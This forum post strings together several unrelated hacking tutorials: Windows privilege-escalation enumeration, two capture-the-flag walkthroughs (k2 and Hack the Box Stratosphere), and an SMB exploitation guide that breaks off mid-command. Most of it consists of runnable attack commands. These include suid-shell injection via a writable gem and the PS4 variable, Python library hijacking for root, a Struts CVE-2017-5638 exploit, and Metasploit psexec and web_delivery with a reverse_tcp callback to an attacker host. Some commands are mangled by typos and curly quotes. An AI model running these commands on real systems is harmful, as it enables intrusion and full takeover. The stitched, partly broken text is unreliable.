05-14-2020, 09:40 AM
| 0 | 0 | ||
Table of Content
- Introduction
- Vectors of Privilege Escalation
- Windows-Exploit-Suggester
- Windows Gather Applied Patches
- Sherlock
- JAWS – Just Another Windows (Enum) Script
- PowerUp
Basically privilege escalation is a phase that comes after the attacker has compromised the victim’s machine where he tries to gather critical information related to systems such as hidden password and weak configured services or applications and etc. All this information help the attacker to make the post exploit against the machine for getting the higher-privileged shell.
Vectors Privilege Escalation
Following information are considered as critical Information of Windows System:
- The version of the operating system
- Any Vulnerable package installed or running
- Files and Folders with Full Control or Modify Access
- Mapped Drives
- Potentially Interesting Files
- Unquoted Service Paths
- Network Information (interfaces, arp, netstat)
- Firewall Status and Rules
- Running Processes
- AlwaysInstallElevated Registry Key Check
- Stored Credentials
- DLL Hijacking
- Scheduled Tasks
Windows-Exploit-suggester
If you have victim’s low-privilege meterpreter or command session then use can use Exploit-Suggester.
This module suggests local meterpreter exploits that can be used. The exploits are suggested based on the architecture and platform that the user has a shell opened as well as the available exploits in meterpreter. It’s important to note that not all local exploits will be fired. Exploits are chosen based on these conditions: session type, platform, architecture, and required default options.
use post/multi/recon/local_exploit_suggester
msf post(local_exploit_suggester) > set lhost 192.168.1.107
msf post(local_exploit_suggester) > set session 1
msf post(local_exploit_suggester) > exploit
1
2
3
4
use post/multi/recon/local_exploit_suggester
msf post(local_exploit_suggester) > set lhost 192.168.1.107
msf post(local_exploit_suggester) > set session 1
msf post(local_exploit_suggester) > exploit
As you can observe it has suggested some post exploits against which the target is vulnerable and that can provide higher-privilege shell.
![[Image: 0.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-QRghhYjshqo/W5NiLTYyMSI/AAAAAAAAaJw/44zzVMg3BVsv2C5NxI3KUvNy_SQ_9xW1QCEwYBhgL/s1600/0.png?w=687)
Windows Gather Applied Patches
This module will attempt to enumerate which patches are applied to a windows system based on the result of the WMI query: SELECT HotFixID FROM Win32_QuickFixEngineering.
use post/windows/gather/enum_patches
msf post(enum_patches) > set session 1
msf post(enum_patches) > exploit
1
2
3
use post/windows/gather/enum_patches
msf post(enum_patches) > set session 1
msf post(enum_patches) > exploit
As you can observe it has also shown that the target is possibly vulnerable to a recommended exploit that can provide higher-privilege shell.
![[Image: 1.1.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-28xri2-XHTQ/W5NiLUCzWGI/AAAAAAAAaJ8/p-gFG16RJ2oqqHExDLqEfF3Wisy37NS4gCEwYBhgL/s1600/1.1.png?w=687)
Sherlock
It is a PowerShell script to quickly find the missing software patches for local privilege escalation vulnerabilities. It also as similar as above post exploit as gives suggestion the target is possibly vulnerable to recommended exploit that can provide higher-privilege shell.
Download it from GitHub with help of the following command and execute when you have a victim’s meterpreter session at least once.
git clone //github.com/rasta-mouse/Sherlock.git
1
git clone //github.com/rasta-mouse/Sherlock.git
![[Image: 2.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-cyDgzuyudao/W5NiMtFJ3gI/AAAAAAAAaJ0/inewhKT9qaAjmjCI3Wg93N2wzhLtveG1ACEwYBhgL/s1600/2.png?w=687)
Since this script should be executed in PowerShell, therefore, load PowerShell and then import the downloading script.
load powershell
1
load powershell
![[Image: 1.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-m-akDc4Zf94/W5NiLk_CijI/AAAAAAAAaJw/UX1fJo_-D08KOagH32KciTjXdnJuVDRXwCEwYBhgL/s1600/1.png?w=687)
powershell_import '/root/Desktop/Sherlock/Sherlock.ps1'
powershell_execute "find-allvulns"
1
2
powershell_import '/root/Desktop/Sherlock/Sherlock.ps1'
powershell_execute "find-allvulns"
The above command will show that the target is possibly vulnerable to a recommended exploit that can be used to achieve a higher-privilege shell.
![[Image: 3.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-rQ2WgZtRrDA/W5NiM0fRm8I/AAAAAAAAaJs/L0681AuLhZQ2FIdJRIyw3b0YE9yxXW8AACEwYBhgL/s1600/3.png?w=687)
JAWS – Just Another Windows (Enum) Script
JAWS is PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It is written using PowerShell 2.0 so ‘should’ run on every Windows version since Windows 7.
Current Features
- Network Information (interfaces, arp, netstat)
- Firewall Status and Rules
- Running Processes
- Files and Folders with Full Control or Modify Access
- Mapped Drives
- Potentially Interesting Files
- Unquoted Service Paths
- Recent Documents
- System Install Files
- AlwaysInstallElevated Registry Key Check
- Stored Credentials
- Installed Applications
- Potentially Vulnerable Services
- MuiCache Files
- Scheduled Tasks
1
git clone //github.com/411Hall/JAWS.git
![[Image: 4.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-cWaIma4OKXE/W5NiNIpoHMI/AAAAAAAAaJw/FPtnrz8sUmUvRww3ekFUEGsCjVML3vZVACEwYBhgL/s1600/4.png?w=687)
Once you have meterpreter shell, upload the downloaded script and use the command shell to run the uploaded script
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
1
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
![[Image: 5.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-sUTQ9NxyM90/W5NiNAWqAyI/AAAAAAAAaJ0/YJRPDSxnEygtt8O8M5ceOuTrAF0CC14QACEwYBhgL/s1600/5.png?w=687)
It will store the critical information into a text file named as “JAWS-Enum.txt”
As said the JAWS-Enum.txt file must have been stored the vector that can lead to privilege escalation, let’s open it and figure out the result.
In the following image, you can observe it has shown all user name and IP configuration.
![[Image: 6.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-8BKv7cWVqP0/W5NiNqb88TI/AAAAAAAAaJ0/87G99h4XhgIQbEgSKIs7FV5Xol1MbbhIwCEwYBhgL/s1600/6.png?w=687)
In this image, we can clearly observe the result of NetStat.
![[Image: 7.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-Rwq5JwHNJXE/W5NiNqU4NAI/AAAAAAAAaJ8/9izoZcFFgZAYFAMwF_FvzQQpMRojXcxkACEwYBhgL/s1600/7.png?w=687)
In this image, we can clearly observe the result of the running process and services.
![[Image: 8.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-Z83rJQVVPfk/W5NiN0-x37I/AAAAAAAAaJ4/FsZ6rPgPaP0kvhd-X_-K2L71khUCIOiSgCEwYBhgL/s1600/8.png?w=687)
In this image, we can clearly observe all install program and patches.
![[Image: 9.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-Bw-mm3Ngw-U/W5NiOAWfX4I/AAAAAAAAaKA/DtbHa9GnafcoaOnBXIde-4EmOUnFffSnACEwYBhgL/s1600/9.png?w=687)
In this image, we can clearly observe the folder with full control and Modify Access and hence many more information can be extracted by running this script.
![[Image: 10.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-NrHQaNz07_8/W5NiMNrH84I/AAAAAAAAaJo/cQdAK5n_lbw-uXZ0n8vdXdOFvrznJ6PHACEwYBhgL/s1600/10.png?w=687)
PowerUp
PowerUp is a Powershell tool to assist with local privilege escalation on Windows systems. PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfiguration.
Running Invoke-AllChecks will output any identifiable vulnerabilities along with specifications for any abuse functions. The HTML Report flag will also generate a COMPUTER.username.html version of the report.
Current Feature
Service Enumeration:
- Get-ServiceUnquoted : – returns services with unquoted paths that also have a space in the name.
- Get-ModifiableServiceFile :- returns services where the current user can write to the service binary path or its config.
- Get-ModifiableService : – returns services the current user can modify.
- Get-ServiceDetail :- returns detailed information about a specified service.
- Invoke-ServiceAbuse : – modifies a vulnerable service to create a local admin or execute a custom command.
- Write-ServiceBinary : – writes out a patched C# service binary that adds a local admin or executes a custom command.
- Install-ServiceBinary :- replaces a service binary with one that adds a local admin or executes a custom command.
- Restore-ServiceBinary :- restores a replaced service binary with the original executable.
- Find-ProcessDLLHijack : – finds potential DLL hijacking opportunities for currently running processes
- Find-PathDLLHijack :- finds service %PATH% DLL hijacking opportunities
- Write-HijackDll : – writes out a hijackable DLL
- Get-RegistryAlwaysInstallElevated:- checks if the AlwaysInstallElevated registry key is set
- Get-RegistryAutoLogon :- checks for Autologon credentials in the registry
- Get-ModifiableRegistryAutoRun :- checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns.
git clone //github.com/PowerShellMafia/PowerSploit.git
cd PowerSploit
ls
cd Privesc
ls
1
2
3
4
5
git clone //github.com/PowerShellMafia/PowerSploit.git
cd PowerSploit
ls
cd Privesc
ls
![[Image: 11.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-ZOc4nKFDWV8/W5NiMdPGBOI/AAAAAAAAaJo/df2JHHrAN8MvFb1AWv2chnLV20r4-GpGwCEwYBhgL/s1600/11.png?w=687)
Again, load PowerShell and then import the downloading script.
load powershell
powershell_import '/root/Desktop/PowerSploit/Privesc/PowerUp.ps1'
powershell_execute Invoke-AllChecks
1
2
3
load powershell
powershell_import '/root/Desktop/PowerSploit/Privesc/PowerUp.ps1'
powershell_execute Invoke-AllChecks
The above command will show that the target is possibly vulnerable to a recommended exploit that can be used to achieve a higher-privilege shell.
![[Image: 12.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-kz7kvVxTmDQ/W5NiMt63lCI/AAAAAAAAaJ4/c3gdsrb7HJ863SFUB5_aatkJKFVtE0oXQCEwYBhgL/s1600/12.png?w=687)
Hello friends! Today we are going to take another CTF challenge known as /dev/random: k2. The credit for making this VM machine goes to “Sagi-” and it is another boot2root challenge in which our goal is to get root to complete the challenge. You can download this VM
[To see content please register here]
.We are given the credentials to log in the VM machine (user: password)
Let us start form getting to know the IP of VM (Here, I have it at 192.168.199.138 but you will have to find your own
netdiscover
1
netdiscover
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-_jHzDWV67-U/W5IQ0HtciwI/AAAAAAAAaIY/m5PqN6XenwEsbPf9CBiFN5NeR5OBPHdEgCEwYBhgL/s1600/1.png?w=687&ssl=1)
We use the given credential to log in through ssh. After logging in we check the sudoers list and find that we can run /bin/calc as user “user2”.
ssh [email protected]
sudo -l
1
2
ssh [email protected]
sudo -l
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-pND7zEiXK_I/W5IQ2WU4iAI/AAAAAAAAaIY/gIj05LS6Pjkco00Br4oJN7qldZnYhWUAACEwYBhgL/s1600/2.png?w=687&ssl=1)
We use strace to debug the binary and if there are missing files or dependencies. We find there is a shared object file missing in /home/user/.config/directory called libcalc.so.
strace /bin/calc 2>&1 | grep -i -E "open|access"
1
strace /bin/calc 2>&1 | grep -i -E "open|access"
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-t1Kwnupcx_8/W5IQ2rlekSI/AAAAAAAAaIU/wD3X7LLUTHg9AF3IYweeKQ3t1d1CcV2FQCEwYBhgL/s1600/3.png?w=687&ssl=1)
We check /home directory and find that the user directory has all permission for the owner only. We give read and execute permission to users in the same group and others. Then we created a directory called .config so that we can create our shared object inside it.
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-6fsdvJS-H04/W5IQ2g_pGuI/AAAAAAAAaIc/Q8aGQzalGL0hOg0YeqBbdzDlYS83KeKmACEwYBhgL/s1600/4.png?w=687&ssl=1)
We created a binary that copy’s /bin/bash into /tmp directory, give it suid permission and run it.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-aAwvuLxJUsY/W5IQ2_itGLI/AAAAAAAAaIc/N4Wf-TN4Pjo-Lx0JNk3RzHqg7T4gxaehQCEwYBhgL/s1600/5.png?w=687&ssl=1)
We save the file as libcalc.c, then we compile and run the /bin/calc as user2. As soon as we run the application we check the id and find that we have successfully spawned a shell as user2.
gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
sudo -u user2 /bin/calc
1
2
gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
sudo -u user2 /bin/calc
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-hNV2Yr1nsaU/W5IQ3D6moOI/AAAAAAAAaIg/RSc-6GzIODcJ2g7H3FtEpJvwD8fhJPFywCEwYBhgL/s1600/6.png?w=687&ssl=1)
After spawning a shell as user2 we try to enumerate the machine and find that there is cronjob that runs a file called /sbin/bckup for user3.
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-Ck8L2dLGZEE/W5IQ3O108lI/AAAAAAAAaIo/GKbC8lcfzwILYzyMGtrzPcoq1khnId02gCEwYBhgL/s1600/7.png?w=687&ssl=1)
We check the content of this file and find that it is a ruby script that creates a zip file in /tmp/ directory.
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-DtV19nr8V9E/W5IQ3bPpYRI/AAAAAAAAaIk/KrHUdA6tXWQgMu3Ke_PS797DyjjKb6IhACEwYBhgL/s1600/8.png?w=687&ssl=1)
We check the zip library of that this ruby is using and find that we can write the file.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-681Lkoc6rhw/W5IQ3pJ2KwI/AAAAAAAAaIk/e_SmwiloIY0_VRNs1jthNR3GboSZ7g2lQCEwYBhgL/s1600/9.png?w=687&ssl=1)
We change the content of the file and add that bash command to copy /bin/bash and save it in /tmp/ directory as bash2 and set suid bit.
echo '`cp /bin/bash /tmp/bash2 && chmod +s /tmp/bash2`’ > /usr/local/share/gems/gems/rubyzip-1.2.1/lib/zip.rb
1
echo '`cp /bin/bash /tmp/bash2 && chmod +s /tmp/bash2`’ > /usr/local/share/gems/gems/rubyzip-1.2.1/lib/zip.rb
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-mJ0mAStPAZA/W5IQ0LufANI/AAAAAAAAaIo/oRSlCuYo7JgMRNEX9G1B-uZlFBeu62UaQCEwYBhgL/s1600/10.png?w=687&ssl=1)
We wait for some time and go to the /tmp/ directory. After changing the directory, we find bash2 has been created by user3. We run the new bash file and successfully spawn a shell as user3.
![[Image: 11.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-rKIvjmjA7PE/W5IQ0YEpcSI/AAAAAAAAaIo/oOqHFw5pY10egarU49V_7PhgkHGlEd-mQCEwYBhgL/s1600/11.png?w=687&ssl=1)
As we effective user id and not the actually used id of user3. We create a c program that spawns a shell as user3’s uid and gid.
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-xO8VOHXzgSM/W5IQ08wwbBI/AAAAAAAAaIQ/KO0fR0GhBIsKt0frDhBAiLfscDKvjeVAwCEwYBhgL/s1600/12.png?w=687&ssl=1)
We compile the program and run it. After running the program, we successfully spawn a shell with user3’s uid and gid.
gcc bash3.c -o bash3
1
gcc bash3.c -o bash3
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-Ls30fE_fDhg/W5IQ1IUSLLI/AAAAAAAAaIg/SyW7OsRUbrIMcLKbLHFif4SdBVychikkQCEwYBhgL/s1600/13.png?w=687&ssl=1)
Now we try to find files with suid bit set and find a file called “whoisme” is “/usr/bin/local/” directory.
find / -perm -4000 2>/dev/null
1
find / -perm -4000 2>/dev/null
![[Image: 14.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-Z4sdO95Cwos/W5IQ1RTivrI/AAAAAAAAaIY/798yX6Cue2Yqw-236H2Uik27P0RUNMeYwCEwYBhgL/s1600/14.png?w=687&ssl=1)
When we run the file it outputs the string “user”. When we check the binary file with strings command we find that it runs setuid, system, setgid and log name command.
![[Image: 15.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-Q8j6OWxRNq8/W5IQ1dA-SbI/AAAAAAAAaIk/E0bnywBF1hs2l8gAzL_IkQg897_IeH_CgCEwYBhgL/s1600/15.png?w=687&ssl=1)
We run by ignoring the environment we use PS4 variable to copy /bin/bash in /tmp/ directory as bash4 and change the ownership to root and set suid bit and run it along the binary file.
env -i SHELLOPTS=xstrace PS4=’$(cp /bin/bash /tmp/bash4 && chown root.root /tmp/bash4 && chmod +s /tmp/bash4)’ /bin/sh -c ‘/usr/local/bin/whoisme’
1
env -i SHELLOPTS=xstrace PS4=’$(cp /bin/bash /tmp/bash4 && chown root.root /tmp/bash4 && chmod +s /tmp/bash4)’ /bin/sh -c ‘/usr/local/bin/whoisme’
![[Image: 16.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-cNhTbdGEAbQ/W5IQ1sud5QI/AAAAAAAAaIg/-upha1bThtU2_7I5Wa_CjU3Vtg6_EyQ_QCEwYBhgL/s1600/16.png?w=687&ssl=1)
As soon as we run the file we find our copied bash file. We run the file and spawn a shell as a root user. We go to the root directory and a file called flag.txt.
![[Image: 17.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-m3wZfINli4o/W5IQ19G4sPI/AAAAAAAAaIQ/8XoKXGe6ww0C9o62ztwUfNlVUzQoAPN9QCEwYBhgL/s1600/17.png?w=687&ssl=1)
We take a look at the content of the file and find our congratulatory flag.
![[Image: 18.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-LsY0QiHRPms/W5IQ2Iz1hcI/AAAAAAAAaIY/d6TSkt8SCD4aOlIiWvLpWn1nf5XKF-w0wCEwYBhgL/s1600/18.png?w=687&ssl=1)
Hello friends!! Today we are going to solve another CTF challenge “Stratosphere” which is a lab presented by Hack the Box and is available online for those who want to increase their skills in penetration testing and black box testing. Stratosphere is a retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Easy
Task: find user.txt and root.txt file in the victim’s machine.
WalkThrough
Since these labs are online available therefore they have static IP. The IP of Stratosphere is 10.10.10.64
Let’s start off with scanning the network to find our target.
nmap -sV 10.10.10.64
1
nmap -sV 10.10.10.64
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-as6As5ZJ1A4/W46eHOB2PUI/AAAAAAAAaCk/tWQV1GAFM5AECywvye114Da4aO82jHvtwCEwYBhgL/s1600/1.png?w=687&ssl=1)
As per nmap port, 80 is open for HTTP let’s explore the target IP in the browser. After exploring port 80, we were welcomed by the following page where we didn’t found any informative clue.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-r_Jt8tYS1wM/W46eIJGpYII/AAAAAAAAaC0/Dzo-1-jmiwIL2n0RgJTqUqt9xbmceXGlwCEwYBhgL/s1600/2.png?w=687&ssl=1)
After then we visit Port 8080 for HTTP proxy and here also we get the same web page. We try to inspect the source code of port 80 and 8080 but we got nothing.
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-2rzGlTuW7cE/W46eIkrcElI/AAAAAAAAaC4/lvTTZ_n9HBoEHGGFfvjLYjNGs8fwxswrgCEwYBhgL/s1600/3.png?w=687&ssl=1)
Therefore next we decided to have directory brute force attack with help of Dirbuster and used wordlist “dictionary-list-2.3-medium.txt” for the attack.
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-iORD8NN1qZg/W46eI5KU9lI/AAAAAAAAaDA/xumQpo1nnaYnn0PVjgRFx_xeshzy6mKuQCEwYBhgL/s1600/4.png?w=687&ssl=1)
Luckily it fetched some web directories such as /Monitoring, let’s explore it in the web browser.
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-td6ah1M-_Pg/W46eI8pAbeI/AAAAAAAAaDg/C9GA9AsoYSYS8d1zo2S7RjI0vSl2zrVyACEwYBhgL/s1600/5.png?w=687&ssl=1)
So when we try to open the URL
[To see content please register here]
then it gets a redirect to[To see content please register here]
for login. I closely look at the URL containing .action extension, so I made Google search to extract complete information related to this extension. I found action extension is utilized by apache struts2 which has a history of bugs and vulnerabilities and if you will search for its exploit, you will get a lot of python scripts and exploits to compromise this service.![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-8YHF3DZamF4/W46eJ7y0NqI/AAAAAAAAaDk/QMHlFKOVqnUMcuvY-TA0pGSyQEmYDhwdQCEwYBhgL/s1600/6.png?w=687&ssl=1)
So we used nmap script to identify its state of vulnerability
nmap -p8080 --script http-vuln-cve2017-5638 --script-args path=/Monitoring/ 10.10.10.64
1
nmap -p8080 --script http-vuln-cve2017-5638 --script-args path=/Monitoring/ 10.10.10.64
Awesome!!! It is vulnerable to cve2017-563, let’s exploit it.
![[Image: 7.1.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-sV8O-6ibbM8/W46eJyJk6cI/AAAAAAAAaDk/NNN0ZmSL3pE8kwcPCz6hE7_qhL_KwM5mwCEwYBhgL/s1600/7.1.png?w=687&ssl=1)
I found an exploit Struts-Apache-ExploitPack, let’s download it from git hub and give full permission.
git clone
[To see content please register here]
cd Struts-Apache-ExploitPackcd Exploiter
ls
chmod 777 Exploit.sh
1
2
3
4
5
git clone
[To see content please register here]
cd Struts-Apache-ExploitPackcd Exploiter
ls
chmod 777 Exploit.sh
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-ub6tK7VqcsA/W46eJyMARtI/AAAAAAAAaDg/7v4VFkGtP749uO-UeTFw8dzKQetJkOfhgCEwYBhgL/s1600/7.png?w=687&ssl=1)
Now run the following command to exploit the victim machine.
./Exploit.sh
[To see content please register here]
idls
cat db_connect
Username: admin
Password: admin
1
2
3
4
5
6
./Exploit.sh
[To see content please register here]
idls
cat db_connect
Username: admin
Password: admin
![[Image: 8.1.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-MCR0Z1M1k08/W46eKUwyiXI/AAAAAAAAaDs/Mm0AeqdxAiMbMMRY9CCycA1FiCFX5iN2wCEwYBhgL/s1600/8.1.png?w=687&ssl=1)
So now we have database credential, let’s utilized them for getting all the information from inside the database.
mysqldump -u admin -padmin --all-databases --skip-lock-tables
1
mysqldump -u admin -padmin --all-databases --skip-lock-tables
Here I found Password “9tc*rhKuG5TyXvUJOrE^5CK7k” for user Richard, now let’s try to connect with SSH using these credential.
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-wziYRgPRxpU/W46eK7WhGVI/AAAAAAAAaDo/vPs4s55xIRkJd42LpcfR8QEJMWs50FkLgCEwYBhgL/s1600/8.png?w=687&ssl=1)
ssh [email protected]
1
ssh [email protected]
Yuppie we successfully logged in victim’s machine, so now let get the user.txt and root.txt
ls
cat user.txt
cat test.py
1
2
3
ls
cat user.txt
cat test.py
Here we notice that test.py was computing some hash values and at the end, it will give success.py from inside the root directory and the whole script depends upon hashlib.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-ZbQnPIinEhk/W46eK45p38I/AAAAAAAAaDs/D1CYL9D1psoQe1t1ooRH4C8CuAYDZwybgCEwYBhgL/s1600/9.png?w=687&ssl=1)
Then we also check sudo rights for Richard and found he has sudo right to run all type of python script. So very first we check test.py file and start solving hashes in order to get success.py
sudo /usr/bin/python /home/richard/test.py
1
sudo /usr/bin/python /home/richard/test.py
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-dBjVEGEe1f0/W46eHXUBcFI/AAAAAAAAaDs/MXBTaGQL1zA7QcGPrLBAPh0ooLBZuixJgCEwYBhgL/s1600/10.png?w=687&ssl=1)
So we got the hash value, now we need to decode it and after decoding I found “kayboo!”
![[Image: 11.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-woJdjuT46JM/W46eHKpCJ-I/AAAAAAAAaDs/JQI-fcaZGX4zAU2IriK0TZnnFvcnwxPsACEwYBhgL/s1600/11.png?w=687&ssl=1)
On submitting the decoded text, it generated a new hash for further step and again I decode it and submit the answer and after then again a new hash and it was processing repetitively same at each time on submitting decoded text.
Since test.py was importing hashlib which was a python library so I last option was python library hijacking to escalate the root privilege.
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-4xsiPzdPxVc/W46eH2M504I/AAAAAAAAaDk/ZcWjz75jD3M-W3vq7a2f9cfdUQrtS7mBwCEwYBhgL/s1600/12.png?w=687&ssl=1)
Therefore I create a hashlib.py script in the current directory to import system binary ‘/bin/bash’ and hence now when we will run the test.py then it will import hashlib.py which will calls /bin/bash binary file.
echo 'import os;os.system("/bin/bash")' > hashlib.py
sudo /usr/bin/python /home/richard/test.py
1
2
echo 'import os;os.system("/bin/bash")' > hashlib.py
sudo /usr/bin/python /home/richard/test.py
Booom!!! Here we owned root access, now let’s get the root.txt file and finish this task.
![[Image: 13.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-riLsBFtMJtY/W46eIKKuIrI/AAAAAAAAaDs/ca08UTOV6KEY3VvH16XYBYv21xxRb4RmQCEwYBhgL/s1600/13.png?w=687&ssl=1)
In this article, we will learn how to connect with victim’s machine via SMB port 445, once you have collected username and password to your victim’s PC. To know how collect username and passwords to your remote host via SMB protocol click
[To see content please register here]
and to understand what is SMB protocol, click[To see content please register here]
Table of Content
Exploiting Windows Server 2008 R2 via SMB through Metasploit inbuilt exploits:
- Microsoft Windows Authenticated User Code Execution
- Microsoft Windows Authenticated Powershell Command Execution
- Microsoft Windows Authenticated Administration Utility
- SMB Impacket WMI Exec
- Impacket (psexec)
- Impacket (exec)
- Psexec exe
- Atelier Web Remote Commander
- MS17-010 EternalRomance SMB Remote code execution
- MS17-010 EternalRomance SMB Remote command execution
Tested on: Windows Server2008 R2
Attacking Machine: Kali Linux
Microsoft Windows Authenticated User Code Execution
This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the “psexec” utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.
msf > use exploit/windows/smb/psexec
msf exploit windows/smb/psexec) > set rhost 192.168.1.104
msf exploit(windows/smb/psexec) > set smbuser administrator
msf exploit(windows/smb/psexec) > set smbpass Ignite@123
msf exploit(windows/smb/psexec) > exploit
1
2
3
4
5
msf > use exploit/windows/smb/psexec
msf exploit windows/smb/psexec) > set rhost 192.168.1.104
msf exploit(windows/smb/psexec) > set smbuser administrator
msf exploit(windows/smb/psexec) > set smbpass Ignite@123
msf exploit(windows/smb/psexec) > exploit
Here,
rhost –> IP of victim PC
smbuser –> username
smbpass –> password
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-rUu1EaD2_g8/W4oz9nFf9UI/AAAAAAAAaCA/atmDMf8fM-ore9-NGH2mBXtCN-E-0mjwACEwYBhgL/s1600/1.png?w=687&ssl=1)
Once the commands run you will gain a meterpreter session of your victim’s PC and so you can access it as you want.
Microsoft Windows Authenticated Powershell Command Execution
This module uses a valid administrator username and password to execute a PowerShell payload using a similar technique to the “psexec” utility provided by SysInternals. The payload is encoded in base64 and executed from the command line using the –encoded command flag. Using this method, the payload is never written to disk, and given that each payload is unique, is less prone to signature-based detection. A persist option is provided to execute the payload in a while loop in order to maintain a form of persistence. In the event of a sandbox observing PSH execution, a delay and other obfuscation may be added to avoid detection. In order to avoid interactive process notifications for the current user, the psh payload has been reduced in size and wrapped in a PowerShell invocation which hides the window entirely.
msf > use exploit/windows/smb/psexec_psh
msf exploit(windows/smb/psexec_psh) > set rhost 192.168.1.104
msf exploit(windows/smb/psexec_psh) > set smbuser administrator
msf exploit(windows/smb/psexec_psh) > set smbpass Ignite@123
msf exploit(windows/smb/psexec_psh) > exploit
1
2
3
4
5
msf > use exploit/windows/smb/psexec_psh
msf exploit(windows/smb/psexec_psh) > set rhost 192.168.1.104
msf exploit(windows/smb/psexec_psh) > set smbuser administrator
msf exploit(windows/smb/psexec_psh) > set smbpass Ignite@123
msf exploit(windows/smb/psexec_psh) > exploit
Once again as the commands run you will gain a meterpreter session of victim’s PC. And therefore, you can do as you wish.
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-ZxbGdVg37ao/W4oz_F0OemI/AAAAAAAAaCQ/yY-0yhRRY28Ywkc_HHircOMPhGg4ZP9VACEwYBhgL/s1600/2.png?w=687&ssl=1)
Microsoft Windows Authenticated Administration Utility
This module uses a valid administrator username and password to execute an arbitrary command on one or more hosts, using a similar technique than the “psexec” utility provided by SysInternals. Daisy chaining commands with ‘&’ do not work and users shouldn’t try it. This module is useful because it doesn’t need to upload any binaries to the target machine.
Thus, in a new Metasploit framework we had used web delivery module to get malicious dll code which we can use as an arbitrary command on the host.
use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 3
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 192.168.1.106
msf exploit(multi/script/web_delivery) > exploit
1
2
3
4
5
use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 3
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 192.168.1.106
msf exploit(multi/script/web_delivery) > exploit
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-nF2YQfDj2A4/W4oz_u6GkQI/AAAAAAAAaCM/gJCvANEywmglHs1IlQiuAxa4UhyzXNhBgCEwYBhgL/s1600/4.png?w=687&ssl=1)
Copy the highlighted text for malicious dll code.
msf > use auxiliary/admin/smb/psexec_command
msf auxiliary(admin/smb/psexec_command) > set rhosts 192.168.1.104
msf auxiliary(admin/smb/psexec_command) > set smbuser administrator
